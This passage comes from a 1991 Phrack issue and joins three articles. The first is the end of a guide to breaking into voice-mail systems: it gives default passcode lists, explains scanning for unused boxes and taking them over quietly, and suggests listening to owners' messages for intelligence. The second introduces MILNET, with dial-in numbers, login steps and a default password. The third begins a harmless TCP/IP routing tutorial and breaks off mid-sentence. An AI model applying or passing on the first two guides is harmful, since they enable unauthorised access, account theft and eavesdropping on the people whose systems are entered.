|||
|
abort ( usually by pressing (*) or (#) ) and it will start over again. From
|
|||
|
there you can keep repeating this until you find a box you can hack on.
|
|||
|
|
|||
|
|
|||
|
FINDING THE LOGIN SEQUENCE
|
|||
|
|
|||
|
Different vmb systems have different login sequences (the way the vmb owner
|
|||
|
gets into his box). The most common way is to hit the pound (#) key from the
|
|||
|
main menu. This pound method works on most systems, including Aspens (more
|
|||
|
on specific systems later). It should respond with something like 'Enter
|
|||
|
your mailbox.' and then 'Enter your passcode.' Some systems have the
|
|||
|
asterisk (*) key perform this function. Another login method is hitting a
|
|||
|
special key during the greeting (opening message) of the vmb. On a Cindy or
|
|||
|
Q Voice Mail system you hit the zero (0) key during the greet and since
|
|||
|
you've already entered your mailbox number it will respond with 'Enter your
|
|||
|
passcode.' If (0) doesn't do anything try (#) or (*). These previous two
|
|||
|
methods of login are the most common, but it is possible some systems will
|
|||
|
not respond to these commands. If this should happen, keep playing around
|
|||
|
with it and trying different keys. If for some reason you cannot find the
|
|||
|
login sequence, then save this system for later and move on.
|
|||
|
|
|||
|
|
|||
|
GETTING IN
|
|||
|
|
|||
|
This is where the basic hacking skills come to use. When a system
|
|||
|
administrator creates a box for someone, they use what's called a default
|
|||
|
passcode. This same code is used for all the new boxes on the system, and
|
|||
|
often on other systems too. Once the legitimate owner logs into his new vmb,
|
|||
|
they are usually prompted to change the passcode, but not everyone realizes
|
|||
|
that someone will be trying to get into their mailbox and quite a few people
|
|||
|
leave their box with the default passcode or no passcode at all. You should
|
|||
|
try ALL the defaults I have listed first.
|
|||
|
|
|||
|
|
|||
|
DEFAULTS BOX NUMBER TRY
|
|||
|
|
|||
|
box number (bn) 3234 3234 Most Popular
|
|||
|
bn backwards 2351 1532 Popular
|
|||
|
bn+'0' 323 3230 Popular With Aspens
|
|||
|
|
|||
|
Some additional defaults in order of most to least common are:
|
|||
|
|
|||
|
4d 5d 6d
|
|||
|
0000 00000 000000 *MOST POPULAR*
|
|||
|
9999 99999 999999 *POPULAR*
|
|||
|
1111 11111 111111 *POPULAR*
|
|||
|
1234 12345 123456 *VERY POPULAR WITH OWNERS*
|
|||
|
4321 54321 654321
|
|||
|
6789 56789 456789
|
|||
|
9876 98765 987654
|
|||
|
2222 22222 222222
|
|||
|
3333 33333 333333
|
|||
|
4444 44444 444444
|
|||
|
5555 55555 555555
|
|||
|
6666 66666 666666
|
|||
|
7777 77777 777777
|
|||
|
8888 88888 888888
|
|||
|
1991
|
|||
|
|
|||
|
|
|||
|
It is important to try ALL of these before giving up on a system. If none of
|
|||
|
these defaults work, try anything you think may be their passcode. Also
|
|||
|
remember that just because the system can have a four digit passcode the vmb
|
|||
|
owner does not have to have use all four digits. If you still cannot get
|
|||
|
into the box, either the box owner has a good passcode or the system uses a
|
|||
|
different default. In either case, move on to another box. If you seem to
|
|||
|
be having no luck, then come back to this system later. There are so many
|
|||
|
vmb systems you should not spend too much time on one hard system.
|
|||
|
|
|||
|
If there's one thing I hate, it's a text file that says 'Hack into the
|
|||
|
system. Once you get in...' but unlike computer systems, vmb systems really
|
|||
|
are easy to get into. If you didn't get in, don't give up! Try another
|
|||
|
system and soon you will be in. I would say that 90% of all voice mail
|
|||
|
systems have a default listed above. All you have to do is find a box with
|
|||
|
one of the defaults.
|
|||
|
|
|||
|
|
|||
|
ONCE YOU'RE IN
|
|||
|
|
|||
|
The first thing you should do is listen to the messages in the box, if there
|
|||
|
are any. Take note of the dates the messages were left. If they are more
|
|||
|
than four weeks old, then it is pretty safe to assume the owner is not using
|
|||
|
his box. If there are any recent messages on it, you can assume he is
|
|||
|
currently using his box. NEVER take a box in use. It will be deleted soon,
|
|||
|
and will alert the system administrator that people are hacking the system.
|
|||
|
This is the main reason vmb systems either go down, or tighten security. If
|
|||
|
you take a box that is not being used, it's probable no one will notice for
|
|||
|
quite a while.
|
|||
|
|
|||
|
|
|||
|
SCANNING BOXES FROM THE INSIDE
|
|||
|
|
|||
|
>From the main menu, see if there is an option to either send a message to
|
|||
|
another user or check receipt of a message. If there is you can search for
|
|||
|
VIRGIN (unused) boxes) without being disconnected like you would from
|
|||
|
outside of a box. Virgin boxes have a 'generic' greeting and name. Eg.
|
|||
|
'Mailbox xxx' or 'Please leave your message for mailbox xxx...' Write down
|
|||
|
any boxes you find with a generic greeting or name, because they will
|
|||
|
probably have the default passcode. Another sign of a virgin box is a name
|
|||
|
or greeting like 'This mailbox is for ...' or a women's voice saying a man's
|
|||
|
name and vice versa, which is the system administrator's voice. If the box
|
|||
|
does not have this feature, simply use the previous method of scanning boxes
|
|||
|
from the outside. For an example of interior scanning, when inside an Aspen
|
|||
|
box, chose (3) from the main menu to check for receipt. It will respond with
|
|||
|
'Enter box number.' It is a good idea to start at a location you know there
|
|||
|
are boxes present and scan consecutively, noting any boxes with a 'generic'
|
|||
|
greeting. If you enter an invalid box it will alert you and allow you to
|
|||
|
enter another. You can enter invalid box numbers forever, instead of the
|
|||
|
usual three incorrect attempts from outside a box.
|
|||
|
|
|||
|
|
|||
|
TAKING A BOX
|
|||
|
|
|||
|
Now you need to find a box you can take over. NEVER take a box in use; it
|
|||
|
simply won't last. Deserted boxes (with messages from months ago) are the
|
|||
|
best and last the longest. Take these first. New boxes have a chance of
|
|||
|
lasting, but if the person for whom the box was created tries to login,
|
|||
|
you'll probably lose it. If you find a box with the system administrator's
|
|||
|
voice saying either the greeting or name (quite common), keeping it that way
|
|||
|
will prolong the box life, especially the name.
|
|||
|
|
|||
|
This is the most important step in taking over a box! Once you pick a box take
|
|||
|
over, watch it for at least three days BEFORE changing anything! Once
|
|||
|
you think it's not in use, then change only the passcode, nothing else!
|
|||
|
Then login frequently for two to three days to monitor the box and make sure
|
|||
|
no one is leaving messages in it. Once you are pretty sure it is deserted,
|
|||
|
change your greeting to something like 'Sorry I'm not in right now, please
|
|||
|
leave your name and number and I'll get back to you.' DO NOT say 'This is
|
|||
|
Night Ranger dudes...' because if someone hears that it's good as gone. Keep
|
|||
|
your generic greeting for one week. After that week, if there are no
|
|||
|
messages from legitimate people, you can make your greeting say whatever you
|
|||
|
want. The whole process of getting a good vmb (that will last) takes about
|
|||
|
7-10 days, the more time you take the better chance you have of keeping it
|
|||
|
for long time. If you take it over as soon as you get in, it'll probably
|
|||
|
last you less than a week. If you follow these instructions, chances are it
|
|||
|
will last for months. When you take some boxes, do not take too many at one
|
|||
|
time. You may need some to scan from later. Plus listening to the messages
|
|||
|
of the legitimate users can supply you with needed information, such as the
|
|||
|
company's name, type of company, security measures, etc.
|
|||
|
|
|||
|
|
|||
|
SYSTEM IDENTIFICATION
|
|||
|
|
|||
|
After you have become familiar with various systems, you will recognize them
|
|||
|
by their characteristic female (or male) voice and will know what defaults
|
|||
|
are most common and what tricks you can use. The following is a few of a few
|
|||
|
popular vmb systems.
|
|||
|
|
|||
|
ASPEN is one of the best vmb systems with the most features. Many of them
|
|||
|
will allow you to have two greetings (a regular and an extended absence
|
|||
|
greeting), guest accounts, urgent or regular messages, and numerous other
|
|||
|
features. Aspens are easy to recognize because the female voice is very
|
|||
|
annoying and often identifies herself as Aspen. When you dial up an Aspen
|
|||
|
system, sometimes you have to enter an (*) to get into the vmb system. Once
|
|||
|
you're in you hit (#) to login. The system will respond with 'Mailbox number
|
|||
|
please?' If you enter an invalid mailbox the first time it will say 'Mailbox
|
|||
|
xxx is invalid...' and the second time it will say 'You dialed xxx, there is
|
|||
|
no such number...' and after a third incorrect entry it will hang up. If
|
|||
|
you enter a valid box, it will say the box owner's name and 'Please enter
|
|||
|
your passcode.' The most common default for Aspens is either box number or
|
|||
|
box number + (0). You only get three attempts to enter a correct box number
|
|||
|
and then three attempts to enter a correct passcode until it will disconnect
|
|||
|
you. From the main menu of an Aspen box you can enter (3) to scan for other
|
|||
|
boxes so you won't be hung up like you would from outside the box.
|
|||
|
|
|||
|
CINDY is another popular system. The system will start by saying 'Good
|
|||
|
Morning/Afternoon/Evening. Please enter the mailbox number you wish...' and
|
|||
|
is easy to identify. After three invalid box entries the system will say
|
|||
|
'Good Day/Evening!' and hang up. To login, enter the box number and during
|
|||
|
the greet press (0) then your passcode. The default for ALL Cindy systems is
|
|||
|
(0). From the main menu you can enter (6) to scan for other boxes so you
|
|||
|
won't be hung up. Cindy voice mail systems also have a guest feature, like
|
|||
|
Aspens. You can make a guest account for someone, and give them
|
|||
|
password, and leave them messages. To access their guest account, they just
|
|||
|
login as you would except they enter their guest passcode. Cindy systems
|
|||
|
also have a feature where you can have it call a particular number and
|
|||
|
deliver a recorded message. However, I have yet to get this feature to work
|
|||
|
on any Cindy boxes that I have.
|
|||
|
|
|||
|
MESSAGE CENTER is also very popular, especially with direct dials. To login
|
|||
|
on a Message Center, hit the (*) key during the greet and the system will
|
|||
|
respond with 'Hello <name>. Please enter your passcode.' These vmbs are
|
|||
|
very tricky with their passcode methods. The first trick is when you enter
|
|||
|
an invalid passcode it will stop you one digit AFTER the maximum passcode
|
|||
|
length. Eg. If you enter 1-2-3-4-5 and it gives you an error message you enter
|
|||
|
the fifth digit, that means the system uses a four digit passcode,
|
|||
|
which is most common on Message Centers. The second trick is that if you enter
|
|||
|
an invalid code the first time, no matter what you enter as the second passcode
|
|||
|
it will give you an error message and ask again. Then if you entered the
|
|||
|
correct passcode the second and third time it will let you login. Also, most
|
|||
|
Message Centers do not have a default, instead the new boxes are 'open' and
|
|||
|
when you hit (*) it will let you in. After hitting (*) the first time to
|
|||
|
login a box you can hit (*) again and it will say 'Welcome to the Message
|
|||
|
Center.' and from there you can dial other extensions. This last feature can
|
|||
|
be useful for scanning outside a box. To find a new box, just keep entering
|
|||
|
box numbers and hitting (*) to login. If it doesn't say something to the
|
|||
|
effect of welcome to your new mailbox then just hit (*) again and it will
|
|||
|
send you back to the main system so you can enter another box. This way you
|
|||
|
will not be disconnected. Once you find a box, you can enter (6) 'M'ake a
|
|||
|
message to scan for other boxes with generic names. After hitting (6) it
|
|||
|
will ask for a mailbox number. You can keep entering mailbox numbers until
|
|||
|
you find a generic one. Then you can cancel your message and go hack it out.
|
|||
|
|
|||
|
|
|||
|
Q VOICE MAIL is a rather nice system but not as common. It identifies itself
|
|||
|
'Welcome to Q Voice Mail Paging' so there is no question about what system it
|
|||
|
is. The box numbers are usually five digits and to login you enter (0) like
|
|||
|
a Cindy system. From the main menu you can enter (3) to scan other boxes.
|
|||
|
|
|||
|
There are many more systems I recognize but do not know the name for them.
|
|||
|
You will become familiar with these systems too.
|
|||
|
|
|||
|
|
|||
|
CONCLUSION
|
|||
|
|
|||
|
You can use someone else's vmb system to practice the methods outlined above,
|
|||
|
but if you want a box that will last you need to scan out a virgin system.
|
|||
|
If you did everything above and could not get a vmb, try again on another
|
|||
|
system. If you follow everything correctly, I guarantee you will have more
|
|||
|
vmbs than you know what to do with. When you start getting a lot of them, if
|
|||
|
you are having trouble, or just want to say hi be sure to drop me a line on
|
|||
|
either of my internet addresses, or leave me a voice mail message.
|
|||
|
|
|||
|
NOTE: Some information was purposely not included in this file to prevent
|
|||
|
abuse to various systems.
|
|||
|
|
|||
|
|
|||
|
Night Ranger
|
|||
|
gbatson@clutx.clarkson.edu
|
|||
|
|
|||
|
1-800-666-2336 Box 602 (After Business Hours)
|
|||
|
1-800-435-2008 Box 896 (After Business Hours)
|
|||
|
_______________________________________________________________________________
|
|||
|
|
|||
|
==Phrack Inc.==
|
|||
|
|
|||
|
Volume Three, Issue Thirty-four, File #7 of 11
|
|||
|
_____________________________________
|
|||
|
| |
|
|||
|
| : : : : : : : : : : : : : : : : : |
|
|||
|
| : Brigadier General Swipe : |
|
|||
|
| : : : : : : : : : : : : : : : : : |
|
|||
|
| |
|
|||
|
| presents: |
|
|||
|
_____________________________________
|
|||
|
|
|||
|
| |
|
|||
|
| An Introduction to MILNET |
|
|||
|
| |
|
|||
|
|_____________________________________|
|
|||
|
|
|||
|
: :Introduction: :
|
|||
|
|
|||
|
First of all MILNET is a system used by branches of the military for
|
|||
|
unclassified communications. MILNET produces that infamous TAC login xxx. TAC
|
|||
|
MILNET is run out of the University of Southern California. USC is the ISI
|
|||
|
master dial up. I would also like to point out that the Department of Defense
|
|||
|
tends to frown on people browsing through there system. With that in mind,
|
|||
|
here is a basic overview of MILNET operations.
|
|||
|
|
|||
|
: :Logging On: :
|
|||
|
|
|||
|
MILNET can be reached over through the "nets" or can be directly connected
|
|||
|
to by dialing 1-800-368-2217 or 213-306-1366. The later is the ISI master dial
|
|||
|
up. Most military bases connect through the 800 dial up owned by AT&T.
|
|||
|
|
|||
|
ISIE MASTER LOGON PROCEDURE
|
|||
|
----------------------------
|
|||
|
1> call 213-306-1366
|
|||
|
2> when the phone stops ringing you are connected
|
|||
|
3> enter location number (9 digits) + 1 or 0
|
|||
|
4> hang up and it will call you
|
|||
|
5> pick up the phone and hit the '*' on your phone
|
|||
|
6> hit a carriage return on the computer
|
|||
|
7> at the 'what class?' prompt hit RETURN
|
|||
|
8> then a 'go' prompt will appear and log on as you would the 800 number.
|
|||
|
|
|||
|
MILNET LOGIN PROCEDURE
|
|||
|
-----------------------
|
|||
|
> When you first connect you will see:
|
|||
|
|
|||
|
'WELCOME TO DDN. FOR OFFICIAL USE ONLY.TAC LOGIN
|
|||
|
CALL NIC 1-800-235-3155 FOR HELP
|
|||
|
WRPAT TAC 113 #:36
|
|||
|
|
|||
|
> the person logging on types:
|
|||
|
|
|||
|
@o 1/103
|
|||
|
|
|||
|
YOU ALWAYS TYPE @o then other connections are:
|
|||
|
ISIA 3/103
|
|||
|
ISIB 10:3/52
|
|||
|
ISID 10:0/27
|
|||
|
ISIE 1/103 (THE EXAMPLE)
|
|||
|
ISIF 2/103
|
|||
|
VAX A 10:2/27
|
|||
|
|
|||
|
> Next you will see a 'USER-ID' prompt. The first 4 characters vary but it is
|
|||
|
is always followed by a '-' and what ever connection you choose.
|
|||
|
|
|||
|
User-Id: (example) CER5-ISIE or MRW1-ISIE
|
|||
|
|
|||
|
> The first three letters are the initials of the user followed by a random
|
|||
|
number (1-9).
|
|||
|
|
|||
|
Access Code: (example) 2285UNG6A or 22L8KK5CH
|
|||
|
|
|||
|
> An access code will never contain a ( 1, 0, G, Z).
|
|||
|
|
|||
|
@ USERNAME + PASSWORD IE USERNAME SAC.512AREFW-LGTO
|
|||
|
|
|||
|
THE USERNAME EXPLANATION:
|
|||
|
-------------------------
|
|||
|
The first 3 letters in the example given above are SAC. This stands for
|
|||
|
Strategic Air Command, a branch of the Air Force. Following that is a "."
|
|||
|
Then the unit number and the prime mission. In this case 512AREFW", (512th
|
|||
|
AIR REFUELING WING). Then a '-' and the Individual Squadron name 'LGTO'
|
|||
|
(LOGISTICS GROUND TRANSPORTATION OPERATIONS), a fancy name for the motor pool.
|
|||
|
The password will not be echoed back and should be entered after the
|
|||
|
username. The new user password as a default is: NEW-UZER-ACNT.
|
|||
|
|
|||
|
: :Options: :
|
|||
|
|
|||
|
PROGRAMS AVAILABLE TO SAC USERS:
|
|||
|
-------------------------------
|
|||
|
|
|||
|
ADUTY aids in management of additional duty assignments.
|
|||
|
(International help - use the ? and <ESC> keys, HELP.)
|
|||
|
|
|||
|
ARCHIVE requests files to be stored on tape for later retrieval.
|
|||
|
(Type HELP ARCHIVE <RET> at TOPS-20.)
|
|||
|
|
|||
|
CHAT Provides near real time communication between terminal users on the
|
|||
|
same host computer.
|
|||
|
(Use ? with CHAT.)
|
|||
|
|
|||
|
DAILY Executive appointment scheduling program
|
|||
|
|
|||
|
DCOPY Handles output on DIABLO and XEROX printers
|
|||
|
|
|||
|
EMACS Powerful full-screen text editor
|
|||
|
FOLLOW Suspense follow up program
|
|||
|
|
|||
|
FTP provides file transfer capabilities between host computers
|
|||
|
|
|||
|
FKEYS allows user to define function key (real spiffaruni)
|
|||
|
|
|||
|
HELP the command used by stupid generals or hackers that have never used
|
|||
|
milnet before
|
|||
|
|
|||
|
HERMES E-Mail
|
|||
|
|
|||
|
NCPCALC spreadsheet program
|
|||
|
|
|||
|
PHOTO saves transcripts of sessions
|
|||
|
|
|||
|
REMIND sends user-created reminders
|
|||
|
|
|||
|
RIPSORT a sophisticated data sorting program
|
|||
|
(Described in SAC's User manual (sorry))
|
|||
|
|
|||
|
SCRIBE a powerful text formatter for preparing documents.
|
|||
|
(ISI's manual, SCRIBE manual - soon on MILNET V.2)
|
|||
|
|
|||
|
SPELL text file spelling checker.
|
|||
|
(HELP at TOPS-20 and <DOCUMENTATION> directory international help -?)
|
|||
|
|
|||
|
SUSCON allows the creating, sending, and clearing of suspenses.
|
|||
|
(international help - ? and <ESC>, HELP command)
|
|||
|
|
|||
|
TACOPY used for printing hard copies of files
|
|||
|
(international help - ?)
|
|||
|
|
|||
|
TALK pretty much the same as chat.
|
|||
|
|
|||
|
TIPCOPY predecessor of TACOPY
|
|||
|
|
|||
|
TEACH-EMACS (SELF EXPLANATORY: GIVES LIST OF COMMANDS)
|
|||
|
|
|||
|
TN Tel-Net provides multi-host access on MILNET.
|
|||
|
(HELP at TOPS-20 and <DOCUMENTATION> directory,
|
|||
|
international help - use ? and <ESC>)
|
|||
|
|
|||
|
XED line oriented text editor.
|
|||
|
(HELP at TOPS-20 and <DOCUMENTATION> directory)
|
|||
|
|
|||
|
: :Logging Out: :
|
|||
|
|
|||
|
TYPE: @L
|
|||
|
|
|||
|
: :ID Card: :
|
|||
|
|
|||
|
When a user gets a MILNET account he/she receives a card in the mail that
|
|||
|
looks similar to the diagram below. It is credit card sized and will be blue &
|
|||
|
white.
|
|||
|
_______________________________________
|
|||
|
/ \
|
|||
|
| HOST USC-ISIE 26.1.0.103 |
|
|||
|
| HOST ADMINISTRATOR GORDON,VICKI L. |
|
|||
|
|---------------------------------------|
|
|||
|
| DDN CARD HOLDER: |
|
|||
|
| SMITH, BILL A, 1st LT. |
|
|||
|
| CARD 418475 |
|
|||
|
|---------------------------------------|
|
|||
|
| USER ID:CER5-ISIE |
|
|||
|
| ACCESS CODE:2285ANI6A |
|
|||
|
| USERNAME: SAC.512AREFW-LGTO |
|
|||
|
| PASSWORD: NEW-UZER-ACNT |
|
|||
|
\_______________________________________/
|
|||
|
_______________________________________________________________________________
|
|||
|
|
|||
|
: : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : :
|
|||
|
_______________________________________________________________________________
|
|||
|
|
|||
|
|
|||
|
==Phrack Inc.==
|
|||
|
|
|||
|
Volume Three, Issue Thirty-Four, File #8 of 11
|
|||
|
|
|||
|
A TCP/IP Tutorial : Behind The Internet
|
|||
|
Part Two of Two
|
|||
|
|
|||
|
October 4th, 1991
|
|||
|
|
|||
|
Presented by The Not
|
|||
|
|
|||
|
5. Internet Protocol
|
|||
|
|
|||
|
The IP module is central to internet technology and the essence of IP
|
|||
|
is its route table. IP uses this in-memory table to make all
|
|||
|
decisions about routing an IP packet. The content of the route table
|
|||
|
is defined by the network administrator. Mistakes block
|
|||
|
communication.
|
|||
|
|
|||
|
To understand how a route table is used is to understand
|
|||
|
internetworking. This understanding is necessary for the successful
|
|||
|
administration and maintenance of an IP network.
|
|||
|
|
|||
|
The route table is best understood by first having an overview of
|
|||
|
routing, then learing about IP network addresses, and then looking
|
|||
|
at the details.
|
|||
|
|
|||
|
5.1 Direct Routing
|
|||
|
|
|||
|
The figure below is of a tiny internet with 3 computers: A, B, and C.
|
|||
|
Each computer has the same TCP/IP protocol stack as in Figure 1.
|
|||
|
Each computer's Ethernet interface has its own Ethernet address.
|
|||
|
Each computer has an IP address assigned to the IP interface by the
|
|||
|
network manager, who also has assigned an IP network number to the
|
|||
|
Ethernet.
|
|||
|
|
|||
|
A B C
|
|||
|
| | |
|
|||
|
--o------o------o--
|
|||
|
Ethernet 1
|
|||
|
IP network "development"
|
|||
|
|
|||
|
Figure 6. One IP Network
|
|||
|
|
|||
|
When A sends an IP packet to B, the IP header contains A's IP address
|
|||
|
as the source IP address, and the Ethernet header contains A's
|
|||
|
Ethernet address as the source Ethernet address. Also, the IP header
|
|||
|
contains B's IP address as the destination IP address and the
|
|||
|
Ethernet header contains B's Ethernet address as the des
|
|||
|
----------------------------------------
|
|||
|
|address source destination|
|
|||
|
----------------------------------------
|
|||
|
|IP header A B |
|
|||
|
|Ethernet header A B |
|
|||
|
----------------------------------------
|
|||
|
TABLE 5. Addresses in an Ethernet frame for an IP packet
|
|||
|
from A to B
|
|||
|
|
|||
|
For this simple case, IP is overhead because the IP adds little to
|
|||
|
the service offered by Ethernet. However, IP does add cost: the
|
|||
|
extra CPU processing and network bandwidth to generate, transmit, and
|
|||
|
parse the IP header.
|
|||
|
|
|||
|
When B's IP module receives the IP packet from A, it checks the
|
|||
|
destination IP address against its own, looking for a match, then it
|
|||
|
passes the datagram to the upper-level protocol.
|
|||
|
|
|||
|
This communication between A and B uses direct routing.
|
|||
|
|
|||
|
5.2 Indirect Routing
|
|||
|
|
|||
|
The figure below is a more realistic view of an internet. It is
|
|||
|
composed of 3 Ethernets and 3 IP networks connected by an IP-router
|
|||
|
called computer D. Each IP network has 4 computers; each computer
|
|||
|
has its own IP address and Ethernet address.
|
|||
|
|
|||
|
A B C ----D---- E F G
|
|||
|
| | | | | | | | |
|
|||
|
--o------o------o------o- | -o------o------o------o--
|
|||
|
Ethernet 1 | Ethernet 2
|
|||
|
IP network "development" | IP network "accounting"
|
|||
|
|
|
|||
|
|
|
|||
|
| H I J
|
|||
|
| | | |
|
|||
|
--o-----o------o------o--
|
|||
|
Ethernet 3
|
|||
|
IP network "factory"
|
|||
|
|
|||
|
Figure 7. Three IP Networks; One internet
|
|||
|
|
|||
|
Except for computer D, each computer has a TCP/IP protocol stack like
|
|||
|
that in Figure 1. Computer D is the IP-router; it is connected to
|
|||
|
all 3 networks and therefore has 3 IP addresses and 3 Ethernet
|
|||
|
addresses. Computer D has a TCP/IP protocol stack similar to that in
|
|||
|
Figure 3, except that it has 3 ARP modules and 3 Ethernet drivers
|
|||
|
instead of 2. Please note that computer D has only one IP module.
|
|||
|
|
|||
|
The network manager has assigned a unique number, called an IP
|
|||
|
network number, to each of the Ethernets. The IP network numbers are
|
|||
|
not shown in this diagram, just the network names.
|
|||
|
|
|||
|
When computer A sends an IP packet to computer B, the process is
|
|||
|
identical to the single network example above. Any communication
|
|||
|
between computers located on a single IP network matches the direct
|
|||
|
routing example discussed previously.
|
|||
|
|
|||
|
When computer D and A communicate, it is direct communication. When
|
|||
|
computer D and E communicate, it is direct communication. When
|
|||
|
computer D and H communicate, it is direct communication. This is
|
|||
|
because each of these pairs of computers is on the same IP network.
|
|||
|
|
|||
|
However, when computer A communicates with a computer on the far side
|
|||
|
of the IP-router, communication is no longer direct. A must use D to
|
|||
|
forward the IP packet to the next IP network. This communication is
|
|||
|
called "indirect".
|
|||
|
|
|||
|
This routing of IP packets is done by IP modules and happens
|
|||
|
transparently to TCP, UDP, and the network applications.
|
|||
|
|
|||
|
If A sends an IP packet to E, the source IP address and the source
|
|||
|
Ethernet address are A's. The destination IP address is E's, but
|
|||
|
because A's IP module sends the IP packet to D for forwarding, the
|
|||
|
destination Ethernet address is D's.
|
|||
|
|
|||
|
----------------------------------------
|
|||
|
|address source destination|
|
|||
|
----------------------------------------
|
|||
|
|IP header A E |
|
|||
|
|Ethernet header A D |
|
|||
|
----------------------------------------
|
|||
|
TABLE 6. Addresses in an Ethernet frame for an IP packet
|
|||
|
from A to E (before D)
|
|||
|
|
|||
|
D's IP module receives the IP packet and upon examining the
|
|||
|
destination IP address, says "This is not my IP address," and sends
|
|||
|
the IP packet directly to E.
|
|||
|
|
|||
|
----------------------------------------
|
|||
|
|address source destination|
|
|||
|
----------------------------------------
|
|||
|
|IP header A E |
|
|||
|
|Ethernet header D E |
|
|||
|
----------------------------------------
|
|||
|
TABLE 7. Addresses in an Ethernet frame for an IP packet
|
|||
|
from A to E (after D)
|
|||
|
|
|||
|
In summary, for direct communication, both the source IP address and
|
|||
|
the source Ethernet address is the sender's, and the destination IP
|
|||
|
address and the destination Ethernet addrss is the recipient's. For
|
|||
|
indirect communication, the IP address and Ethernet addresses do not
|
|||
|
pair up in this way.
|
|||
|
|
|||
|
This example internet is a very simple one. Real networks are often
|
|||
|
complicated by many factors, resulting in multiple IP-routers and
|
|||
|
several types of physical networks. This example internet might have
|
|||
|
come about because the network manager wanted to split a large
|
|||
|
Ethernet in order to localize Ethernet broadcast traffic.
|
|||
|
|
|||
|
5.3 IP Module Routing Rules
|
|||
|
|
|||
|
This overview of routing has shown what happens, but not how it
|
|||
|
happens. Now let's examine the rules, or algorithm, used by the IP
|
|||
|
module.
|
|||
|
|
|||
|
For an outgoing IP packet, entering IP from an upper layer, IP must
|
|||
|
decide whether to send the IP packet directly or indirectly, and IP
|
|||
|
must choose a lower network interface. These choices are made by
|
|||
|
consulting the route table.
|
|||
|
|
|||
|
For an incoming IP packet, entering IP from a lower interface, IP
|
|||
|
must decide whether to forward the IP packet or pass it to an upper
|
|||
|
layer. If the IP packet is being forwarded, it is treated as an
|
|||
|
outgoing IP packet.
|
|||
|
|
|||
|
When an incoming IP packet arrives it is never forwarded back out
|
|||
|
through the same network interface.
|
|||
|
|
|||
|
These decisions are made before the IP packet is handed to the lower
|
|||
|
interface and before the ARP table is consulted.
|
|||
|
|
|||
|
5.4 IP Address
|
|||
|
|
|||
|
The network manager assigns IP addresses to computers according to
|
|||
|
the IP network to which the computer is attached. One part of a 4-
|
|||
|
byte IP address is the IP network number, the other part is the IP
|
|||
|
computer number (or host number). For the computer in table 1, with
|
|||
|
an IP address of 223.1.2.1, the network number is 223.1.2 and the
|
|||
|
host number is number 1.
|
|||
|
|
|||
|
The portion of the address that is used for network number and for
|
|||
|
host number is defined by the upper bits in the 4-byte address. All
|
|||
|
example IP addresses in this tutorial are of type class C, meaning
|
|||
|
that the upper 3 bits indicate that 21 bits are the network number
|
|||
|
and 8 bits are the host number. This allows 2,097,152 class C
|
|||
|
networks up to 254 hosts on each network.
|
|||
|
|
|||
|
The IP address space is administered by the NIC (Network Information
|
|||
|
Center). All internets that are connected to the single world-wide
|
|||
|
Internet must use network numbers assigned by the NIC. If you are
|
|||
|
setting up your own internet and you are not intending to connect it
|
|||
|
to the Internet, you should still obtain your network numbers from
|
|||
|
the NIC. If you pick your own number, you run the risk of confusion
|
|||
|
and chaos in the eventuality that your internet is connected to
|
|||
|
another internet.
|
|||
|
|
|||
|
5.5 Names
|
|||
|
|
|||
|
People refer to computers by names, not numbers. A computer called
|
|||
|
alpha might have the IP address of 223.1.2.1. For small networks,
|
|||
|
this name-to-address translation data is often kept on each computer
|
|||
|
in the "hosts" file. For larger networks, this translation data file
|
|||
|
is stored on a server and accessed across the network when needed. A
|
|||
|
few lines from that file might look like this:
|
|||
|
|
|||
|
223.1.2.1 alpha
|
|||
|
223.1.2.2 beta
|
|||
|
223.1.2.3 gamma
|
|||
|
223.1.2.4 delta
|
|||
|
223.1.3.2 epsilon
|
|||
|
223.1.4.2 iota
|
|||
|
|
|||
|
The IP address is the first column and the computer name is the
|
|||
|
second column.
|
|||
|
|
|||
|
In most cases, you can install identical "hosts" files on all
|
|||
|
computers. You may notice that "delta" has only one entry in this
|
|||
|
file even though it has 3 IP addresses. Delta can be reached with
|
|||
|
any of its IP addresses; it does not matter which one is used. When
|
|||
|
delta receives an IP packet and looks at the destination address, it
|
|||
|
will recognize any of its own IP addresses.
|
|||
|
|
|||
|
IP networks are also given names. If you have 3 IP networks, your
|
|||
|
"networks" file for documenting these names might look something like
|
|||
|
this:
|
|||
|
|
|||
|
223.1.2 development
|
|||
|
223.1.3 accounting
|
|||
|
223.1.4 factory
|
|||
|
|
|||
|
The IP network number is in the first column and its name is in the
|
|||
|
second column.
|
|||
|
|
|||
|
From this example you can see that alpha is computer number 1 on the
|
|||
|
development network, beta is computer number 2 on the development
|
|||
|
network and so on. You might also say that alpha is development.1,
|
|||
|
Beta is development.2, and so on.
|
|||
|
|
|||
|
The above hosts file is adequate for the users, but the network
|
|||
|
manager will probably replace the line for delta with:
|
|||
|
|
|||
|
223.1.2.4 devnetrouter delta
|
|||
|
223.1.3.1 facnetrouter
|
|||
|
223.1.4.1 accnetrouter
|
|||
|
|
|||
|
These three new lines for the hosts file give each of delta's IP
|
|||
|
addresses a meaningful name. In fact, the first IP address listed
|
|||
|
has 2 names; "delta" and "devnetrouter" are synonyms. In practice
|
|||
|
"delta" is the general-purpose name of the computer and the other 3
|
|||
|
names are only used when administering the IP route table.
|
|||
|
|
|||
|
These files are used by network administration commands and network
|
|||
|
applications to provide meaningful names. They are not required for
|
|||
|
operation of an internet, but they do make it easier for us.
|
|||
|
|
|||
|
5.6 IP Route Table
|
|||
|
|
|||
|
How does IP know which lower network interface to use when sending
|
|||
|
out a IP packet? IP looks it up in the route table using a search
|
|||
|
key of the IP network number extracted from the IP destination
|
|||
|
address.
|
|||
|
|
|||
|
The route table contains one row for each route. The primary columns
|
|||
|
in the route table are: IP network number, direct/indirect flag,
|
|||
|
router IP address, and interface number. This table is referred to
|
|||
|
by IP for each outgoing IP packet.
|
|||
|
|
|||
|
On most computers the route table can be modified with the "route"
|
|||
|
command. The content of the route table is defined by the network
|
|||
|
manager, because the network manager assigns the IP addresses to the
|
|||
|
computers.
|
|||
|
|
|||
|
5.7 Direct Routing Details
|
|||
|
|
|||
|
To explain how it is used, let us visit in detail the routing
|
|||
|
situations we have reviewed previously.
|
|||
|
|
|||
|
--------- ---------
|
|||
|
| alpha | | beta |
|
|||
|
| 1 | | 1 |
|
|||
|
--------- ---------
|
|||
|
| |
|
|||
|
--------o---------------o-
|
|||
|
Ethernet 1
|
|||
|
IP network "development"
|
|||
|
|
|||
|
Figure 8. Close-up View of One IP Network
|
|||
|
|
|||
|
The route table inside alpha looks like this:
|
|||
|
|
|||
|
